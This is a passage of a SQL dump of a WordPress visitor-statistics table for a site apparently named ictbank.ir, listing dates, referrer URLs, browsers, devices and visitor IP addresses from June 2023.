(34423,'2023-06-17','http://ictbank.ir/blog/category/security/','Chrome','Windows','83.0.0.0','desktop','Unknown','','198.105.108.13','000',0,1,0),
(34424,'2023-06-17','http://ictbank.ir/blog/setup-high-availability-for-haproxy/','Chrome','Windows','83.0.0.0','desktop','Unknown','','185.102.48.54','000',0,1,0),
(34425,'2023-06-17','http://ictbank.ir/blog/sudo-without-password/','Chrome','Windows','83.0.0.0','desktop','Unknown','','216.173.107.49','000',0,1,0),
(34426,'2023-06-17','http://ictbank.ir/blog/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','Chrome','Windows','83.0.0.0','desktop','Unknown','','104.239.40.68','000',0,1,0),
(34427,'2023-06-17','http://ictbank.ir/blog/hosting-a-podcast/','Chrome','Windows','83.0.0.0','desktop','Unknown','','104.239.40.238','000',0,1,0),
(34428,'2023-06-17','http://ictbank.ir/blog/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','83.0.0.0','desktop','Unknown','','37.35.41.254','000',0,1,0),
(34429,'2023-06-17','http://ictbank.ir/blog/how-to-make-apache-web-server-more-secure/','Chrome','Windows','83.0.0.0','desktop','Unknown','','192.186.176.69','000',0,1,0),
(34430,'2023-06-17','http://ictbank.ir/blog/category/os','Chrome','Windows','83.0.0.0','desktop','Unknown','','104.239.20.126','000',0,2,0),
(34431,'2023-06-17','http://ictbank.ir/blog/category/security','Chrome','Windows','83.0.0.0','desktop','Unknown','','206.41.179.221','000',0,2,0),
(34432,'2023-06-17','http://ictbank.ir/blog/connection-encryption-in-oracle-database/','Chrome','Windows','83.0.0.0','desktop','Unknown','','154.194.10.39','000',0,1,0),
(34433,'2023-06-17','http://ictbank.ir/blog/add-new-disk-to-redhat-based-linux-without-reboot/','Chrome','Windows','83.0.0.0','desktop','Unknown','','45.192.141.148','000',0,1,0),
(34434,'2023-06-17','http://ictbank.ir/blog/change-the-character-set-collation-of-a-table/','Chrome','Windows','83.0.0.0','desktop','Unknown','','104.239.91.66','000',0,1,0),
(34435,'2023-06-17','http://ictbank.ir/blog/rebuild-and-reorganize-all-indexes-within-a-database/','Chrome','Windows','83.0.0.0','desktop','Unknown','','181.177.91.190','000',0,1,0),
(34436,'2023-06-17','http://ictbank.ir/blog/backup-restore-progress/','Chrome','Windows','83.0.0.0','desktop','Unknown','','198.23.128.228','000',0,1,0),
(34437,'2023-06-17','http://ictbank.ir/blog/category/database/page/2/','Chrome','Windows','83.0.0.0','desktop','Unknown','','91.246.194.87','000',0,1,0),
(34438,'2023-06-17','http://ictbank.ir/blog/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','Chrome','Windows','83.0.0.0','desktop','Unknown','','104.239.73.174','000',0,1,0),
(34439,'2023-06-17','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.140.5','000',0,2,0),
(34440,'2023-06-17','http://ictbank.ir/blog/impdp-errors-ora-02374-ora-12899/','Chrome','Windows','83.0.0.0','desktop','Unknown','','37.35.41.131','000',0,1,0),
(34441,'2023-06-17','http://ictbank.ir/blog/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','Chrome','Windows','83.0.0.0','desktop','Unknown','','104.239.43.17','000',0,1,0),
(34442,'2023-06-17','https://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(34443,'2023-06-17','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,2,0),
(34444,'2023-06-17','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(34445,'2023-06-17','https://ictbank.ir/blog','Firefox','Windows','110.0','desktop','Unknown','','34.212.114.15','000',0,3,0),
(34446,'2023-06-17','https://ictbank.ir/blog','Firefox','Fedora','95.0','desktop','Unknown','','178.128.123.210','000',0,1,0),
(34447,'2023-06-17','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(34448,'2023-06-17','https://ictbank.ir/blog','Firefox','Fedora','95.0','desktop','Unknown','','208.109.227.196','000',0,1,0),
(34449,'2023-06-17','https://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','51.222.44.188','000',0,1,0),
(34450,'2023-06-17','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.35','000',0,1,0),
(34451,'2023-06-17','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','146.59.52.85','000',0,1,0),
(34452,'2023-06-17','https://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','159.65.168.168','000',0,2,0),
(34453,'2023-06-17','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','54.93.170.148','000',0,2,0),
(34454,'2023-06-17','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,4,0),
(34455,'2023-06-17','https://45.92.94.221:443/blog','Firefox','OS X','32.0','desktop','Macintosh','','148.153.45.234','000',0,1,0),
(34456,'2023-06-17','https://ictbank.ir/blog','Chrome','OS X','39.0.0.0','desktop','Macintosh','','194.169.175.92','000',0,2,0),
(34457,'2023-06-17','https://ns10.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.143','000',0,2,0),
(34458,'2023-06-17','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(34459,'2023-06-17','https://ictbank.ir/blog','Chrome','Windows','85.0.0.0','desktop','Unknown','','45.137.203.13','000',0,1,0),
(34460,'2023-06-17','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','51.83.238.159','000',0,1,0),
(34461,'2023-06-17','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,2,0),
(34462,'2023-06-17','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','45.156.129.12','000',0,1,0),
(34463,'2023-06-17','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.185.140.160','000',0,1,0),
(34464,'2023-06-17','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.141','000',0,2,0),
(34465,'2023-06-17','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.140.4','000',0,1,0),
(34466,'2023-06-17','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.37','000',0,1,0),
(34467,'2023-06-17','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','54.151.83.114','000',0,1,0),
(34468,'2023-06-17','https://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,1,0),
(34469,'2023-06-17','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.6','000',0,1,0),
(34470,'2023-06-17','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.54','000',0,2,0),
(34471,'2023-06-18','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,18,0),
(34472,'2023-06-18','https://45.92.94.221:443/blog','Chrome','OS X','92.0.0.0','desktop','Macintosh','','165.227.48.163','000',0,6,0),
(34473,'2023-06-18','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,2,0),
(34474,'2023-06-18','https://45.92.94.221:443/blog','Unknown','Unknown','Unknown','','Unknown','','106.75.153.26','000',0,4,0),
(34475,'2023-06-18','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(34476,'2023-06-18','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,2,0),
(34477,'2023-06-18','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.34','000',0,1,0),
(34478,'2023-06-18','https://ictbank.ir/blog','Chrome','Windows','113.0.0.0','desktop','Unknown','','185.250.205.106','000',0,1,0),
(34479,'2023-06-18','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(34480,'2023-06-18','https://45.92.94.221:443/blog','Chrome','OS X','92.0.0.0','desktop','Macintosh','','178.62.79.241','000',0,2,0),
(34481,'2023-06-18','https://www.google.com/','Firefox','Windows','114.0','desktop','Unknown','','105.245.97.198','000',0,1,0),
(34482,'2023-06-18','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,4,0),
(34483,'2023-06-18','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.198.5.191','000',0,1,0),
(34484,'2023-06-18','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.54','000',0,2,0),
(34485,'2023-06-18','https://ictbank.ir/blog','Firefox','Windows','52.0','desktop','Unknown','','217.182.71.160','000',0,9,0),
(34486,'2023-06-18','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','114.0.0.0','desktop','Unknown','','77.238.113.61','000',0,289,0),
(34487,'2023-06-18','https://ictbank.ir/golrang_payment/major_buyers/sw.js','Chrome','Windows','114.0.0.0','desktop','Unknown','','5.160.29.66','000',0,24,0),
(34488,'2023-06-18','https://ictbank.ir/blog','Chrome','Android','73.0.0.0','mobile:smart','Galaxy J1 Ace','','157.245.148.173','000',0,2,0),
(34489,'2023-06-18','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,4,0),
(34490,'2023-06-18','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.44','000',0,2,0),
(34491,'2023-06-18','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.71','000',0,2,0),
(34492,'2023-06-18','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,4,0),
(34493,'2023-06-18','https://ictbank.ir/blog','Edge','Windows','.0','desktop','Unknown','','82.165.163.141','000',0,1,0),
(34494,'2023-06-18','https://ictbank.ir/blog','Unknown','Windows','Unknown','desktop','Unknown','','89.46.223.134','000',0,1,0),
(34495,'2023-06-18','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,2,0),
(34496,'2023-06-18','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(34497,'2023-06-18','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.88.109.195','000',0,1,0),
(34498,'2023-06-18','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.209.162','000',0,2,0),
(34499,'2023-06-18','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.18','000',0,1,0),
(34500,'2023-06-18','https://ictbank.ir/blog','Unknown','Windows','Unknown','desktop','Unknown','','93.158.91.229','000',0,1,0),
(34501,'2023-06-18','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','62.210.245.181','000',0,21,0),
(34502,'2023-06-18','https://ictbank.ir/hooman/admin/index.php','Chrome','Windows','114.0.0.0','desktop','Unknown','','5.237.184.172','000',0,1,0),
(34503,'2023-06-18','https://ictbank.ir/hooman/admin/','Chrome','Windows','114.0.0.0','desktop','Unknown','','5.237.136.222','000',0,10,0),
(34504,'2023-06-18','https://ictbank.ir/blog','Chrome','Linux','110.0.0.0','desktop','Unknown','','192.171.94.85','000',0,1,0),
(34505,'2023-06-18','http://ictbank.ir/blog/connection-encryption-in-oracle-database/','Edge','Windows','.0','gaming:console','Xbox One','','103.157.139.7','000',0,2,0),
(34506,'2023-06-18','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.35','000',0,1,0),
(34507,'2023-06-18','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','23.251.102.74','000',0,1,0);
INSERT INTO `wp_statistics_visitor` VALUES
(34508,'2023-06-18','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.140','000',0,2,0),
(34509,'2023-06-18','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','152.32.153.103','000',0,3,0),
(34510,'2023-06-18','https://ictbank.ir/blog','Edge','Windows','.0','desktop','Unknown','','5.188.87.37','000',0,1,0),
(34511,'2023-06-18','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.244.114.206','000',0,1,0),
(34512,'2023-06-19','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','92.118.39.109','000',0,2,0),
(34513,'2023-06-19','https://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','176.241.74.91','000',0,127,0),
(34514,'2023-06-19','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,4,0),
(34515,'2023-06-19','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.158.37.190','000',0,4,0),
(34516,'2023-06-19','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,2,0),
(34517,'2023-06-19','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,6,0),
(34518,'2023-06-19','https://ictbank.ir/blog/','Chrome','Windows','103.0.0.0','desktop','Unknown','','136.169.243.170','000',0,7,0),
(34519,'2023-06-19','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(34520,'2023-06-19','https://45.92.94.221:443/blog','Chrome','OS X','92.0.0.0','desktop','Macintosh','','139.59.170.127','000',0,4,0),
(34521,'2023-06-19','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.35','000',0,1,0),
(34522,'2023-06-19','https://ictbank.ir/blog','Chrome','Windows','96.0.0.0','desktop','Unknown','','23.146.240.163','000',0,2,0),
(34523,'2023-06-19','https://45.92.94.221:443/blog','Chrome','OS X','92.0.0.0','desktop','Macintosh','','143.110.192.163','000',0,2,0),
(34524,'2023-06-19','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(34525,'2023-06-19','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','52.237.165.199','000',0,1,0),
(34526,'2023-06-19','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,4,0),
(34527,'2023-06-19','https://mail.nikoo-academy.com/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','106.75.166.184','000',0,1,0),
(34528,'2023-06-19','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.54','000',0,2,0),
(34529,'2023-06-19','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','192.36.109.89','000',0,1,0),
(34530,'2023-06-19','https://ictbank.ir/blog','Firefox','Windows','60.0','desktop','Unknown','','83.220.168.200','000',0,1,0),
(34531,'2023-06-19','https://ictbank.ir/hooman/admin/','Chrome','Windows','114.0.0.0','desktop','Unknown','','5.237.154.86','000',0,124,0),
(34532,'2023-06-19','https://mail.nikoo-academy.com/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','106.75.132.214','000',0,1,0),
(34533,'2023-06-19','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,3,0),
(34534,'2023-06-19','https://ictbank.ir/blog','Chrome','Windows','99.0.0.0','desktop','Unknown','','139.59.84.153','000',0,1,0),
(34535,'2023-06-19','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(34536,'2023-06-19','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,2,0),
(34537,'2023-06-19','http://ictbank.ir','Chrome','Windows','74.0.0.0','desktop','Unknown','','93.113.110.128','000',0,1,0),
(34538,'2023-06-19','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','52.140.118.35','000',0,1,0),
(34539,'2023-06-19','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','92.118.39.108','000',0,2,0),
(34540,'2023-06-19','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.7','000',0,2,0),
(34541,'2023-06-19','http://ictbank.ir/blog/connection-encryption-in-oracle-database/','Edge','Windows','.0','gaming:console','Xbox One','','138.199.55.184','000',0,2,0),
(34542,'2023-06-19','http://ictbank.ir/blog/connection-encryption-in-oracle-database/','Edge','Windows','.0','gaming:console','Xbox One','','185.107.95.212','000',0,2,0),
(34543,'2023-06-19','https://ictbank.ir/blog','Chrome','Windows','83.0.0.0','desktop','Unknown','','139.144.179.96','000',0,4,0),
(34544,'2023-06-19','https://45.92.94.221:443/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','83.97.73.89','000',0,15,0),
(34545,'2023-06-19','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.158.37.186','000',0,1,0),
(34546,'2023-06-19','https://mail.wikisonnati.com/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','106.75.164.84','000',0,1,0),
(34547,'2023-06-19','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.18','000',0,1,0),
(34548,'2023-06-19','https://ictbank.ir/blog','Chrome','Windows','83.0.0.0','desktop','Unknown','','138.68.248.59','000',0,3,0),
(34549,'2023-06-19','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','5.196.176.254','000',0,8,0),
(34550,'2023-06-19','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.71','000',0,2,0),
(34551,'2023-06-19','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.219.242.31','000',0,1,0),
(34552,'2023-06-19','http://ictbank.ir/blog/connection-encryption-in-oracle-database/','Edge','Windows','.0','gaming:console','Xbox One','','172.86.122.201','000',0,2,0),
(34553,'2023-06-19','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','27.115.124.49','000',0,3,0),
(34554,'2023-06-19','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','27.115.124.48','000',0,2,0),
(34555,'2023-06-19','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','27.115.124.3','000',0,2,0),
(34556,'2023-06-19','https://ictbank.ir/blog','Edge','Windows','.0','desktop','Unknown','','5.188.87.37','000',0,1,0),
(34557,'2023-06-19','https://ictbank.ir/blog','Firefox','Windows','78.0','desktop','Unknown','','193.33.133.200','000',0,3,0),
(34558,'2023-06-19','https://ictbank.ir/blog','Firefox','Windows','87.0','desktop','Unknown','','31.42.191.193','000',0,2,0),
(34559,'2023-06-19','https://ictbank.ir/blog','Firefox','Windows','76.0','desktop','Unknown','','178.208.70.86','000',0,2,0),
(34560,'2023-06-19','https://ictbank.ir/blog','Firefox','Windows','78.0','desktop','Unknown','','194.61.54.165','000',0,2,0),
(34561,'2023-06-19','https://ictbank.ir/blog','Firefox','Windows','70.0','desktop','Unknown','','91.240.87.190','000',0,1,0),
(34562,'2023-06-19','https://design-arena.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','27.115.124.40','000',0,1,0),
(34563,'2023-06-19','https://design-arena.ir/blog/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','27.115.124.33','000',0,1,0),
(34564,'2023-06-19','https://design-arena.ir/blog/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','27.115.124.34','000',0,1,0),
(34565,'2023-06-19','https://ictbank.ir/blog','Firefox','Fedora','95.0','desktop','Unknown','','148.72.207.110','000',0,1,0),
(34566,'2023-06-19','https://ictbank.ir/blog','Firefox','Fedora','95.0','desktop','Unknown','','64.90.48.2','000',0,1,0),
(34567,'2023-06-19','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','45.156.128.12','000',0,2,0),
(34568,'2023-06-19','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,2,0),
(34569,'2023-06-19','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.34','000',0,1,0),
(34570,'2023-06-19','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,2,0),
(34571,'2023-06-19','https://ictbank.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','152.32.135.231','000',0,1,0),
(34572,'2023-06-19','http://design-arena.ir','Chrome','Windows','74.0.0.0','desktop','Unknown','','157.245.107.85','000',0,1,0),
(34573,'2023-06-20','http://ictbank.ir','Chrome','Windows','74.0.0.0','desktop','Unknown','','107.191.102.204','000',0,2,0),
(34574,'2023-06-20','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(34575,'2023-06-20','https://45.92.94.221:443/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','83.97.73.89','000',0,9,0),
(34576,'2023-06-20','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,2,0),
(34577,'2023-06-20','https://ictbank.ir/blog','Chrome','Windows','67.0.0.0','desktop','Unknown','','51.158.112.86','000',0,1,0),
(34578,'2023-06-20','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.137','000',0,1,0),
(34579,'2023-06-20','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,2,0),
(34580,'2023-06-20','https://ictbank.ir/blog/','Chrome','Windows','103.0.0.0','desktop','Unknown','','136.169.243.170','000',0,4,0),
(34581,'2023-06-20','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.79','000',0,1,0),
(34582,'2023-06-20','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.140.6','000',0,2,0),
(34583,'2023-06-20','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.44','000',0,4,0),
(34584,'2023-06-20','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.35','000',0,1,0),
(34585,'2023-06-20','https://ictbank.ir/blog','Android Browser','Android','Unknown','mobile:smart','Optimus LTE2','','23.100.19.156','000',0,1,0),
(34586,'2023-06-20','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.140.4','000',0,1,0),
(34587,'2023-06-20','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.6','000',0,2,0),
(34588,'2023-06-20','https://www.google.com/','Chrome','Windows','114.0.0.0','desktop','Unknown','','124.123.96.35','000',0,1,0),
(34589,'2023-06-20','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(34590,'2023-06-20','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(34591,'2023-06-20','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','3.237.103.146','000',0,2,0),
(34592,'2023-06-20','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.251.14.232','000',0,2,0),
(34593,'2023-06-20','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.89.195.210','000',0,1,0),
(34594,'2023-06-20','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,4,0),
(34595,'2023-06-20','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.8','000',0,2,0),
(34596,'2023-06-20','https://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,2,0),
(34597,'2023-06-20','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','212.94.129.216','000',0,1,0),
(34598,'2023-06-20','http://ictbank.ir/blog/connection-encryption-in-oracle-database/','Chrome','Windows','103.0.0.0','desktop','Unknown','','188.214.122.83','000',0,2,0),
(34599,'2023-06-20','https://ictbank.ir/blog','Firefox','Windows','72.0','desktop','Unknown','','91.193.183.107','000',0,2,0),
(34600,'2023-06-20','https://ictbank.ir/blog','Chrome','Windows','114.0.0.0','desktop','Unknown','','5.160.29.66','000',0,1,0),
(34601,'2023-06-20','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','146.59.69.71','000',0,1,0),
(34602,'2023-06-20','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','114.0.0.0','desktop','Unknown','','5.237.182.20','000',0,53,0),
(34603,'2023-06-20','https://ictbank.ir/blog','Firefox','Ubuntu','58.0','desktop','Unknown','','37.187.215.243','000',0,1,0),
(34604,'2023-06-20','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,2,0),
(34605,'2023-06-20','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.42','000',0,1,0),
(34606,'2023-06-20','https://ictbank.ir/blog','Chrome','Windows','83.0.0.0','desktop','Unknown','','206.189.196.2','000',0,2,0),
(34607,'2023-06-20','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','104.168.135.211','000',0,1,0),
(34608,'2023-06-20','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.11','000',0,1,0),
(34609,'2023-06-20','https://ictbank.ir/hooman/admin/','Chrome','OS X','114.0.0.0','desktop','Macintosh','','89.37.154.135','000',0,7,0),
(34610,'2023-06-20','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','192.3.232.23','000',0,2,0),
(34611,'2023-06-20','https://ictbank.ir/blog','Chrome','Windows','70.0.0.0','desktop','Unknown','','143.110.180.213','000',0,1,0),
(34612,'2023-06-20','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,2,0),
(34613,'2023-06-20','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','45.156.129.2','000',0,2,0),
(34614,'2023-06-20','https://ICTBANK.IR/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','89.107.184.213','000',0,2,0),
(34615,'2023-06-20','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','54.38.44.6','000',0,2,0),
(34616,'2023-06-20','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','173.236.219.242','000',0,2,0),
(34617,'2023-06-20','https://ICTBANK.IR/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','50.116.29.40','000',0,2,0),
(34618,'2023-06-20','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','67.222.148.220','000',0,2,0),
(34619,'2023-06-20','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','207.246.240.107','000',0,2,0),
(34620,'2023-06-20','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','162.0.215.210','000',0,2,0),
(34621,'2023-06-20','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','31.22.7.240','000',0,2,0),
(34622,'2023-06-20','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','103.93.59.155','000',0,2,0),
(34623,'2023-06-20','https://ICTBANK.IR/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','80.51.216.11','000',0,1,0),
(34624,'2023-06-20','https://ictbank.ir/hooman/admin/index.php?student_course_schedule_id=542&func3=homepage.change.status&class_status=1','Chrome','Windows','114.0.0.0','desktop','Unknown','','5.237.155.91','000',0,99,0),
(34625,'2023-06-20','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.134','000',0,2,0),
(34626,'2023-06-20','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','43.156.217.94','000',0,1,0),
(34627,'2023-06-20','http://ictbank.ir/blog/connection-encryption-in-oracle-database/','Vivaldi','Windows','5.0.0.0','desktop','Unknown','','103.157.139.7','000',0,2,0),
(34628,'2023-06-20','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,2,0),
(34629,'2023-06-20','https://ictbank.ir/blog','Chrome','Android','114.0.0.0','mobile:smart','Nexus 5X','','64.233.172.227','000',0,1,0),
(34630,'2023-06-20','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(34631,'2023-06-20','https://ictbank.ir/blog','Firefox','Ubuntu','3.0.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(34632,'2023-06-20','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','51.254.199.11','000',0,2,0),
(34633,'2023-06-20','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,2,0),
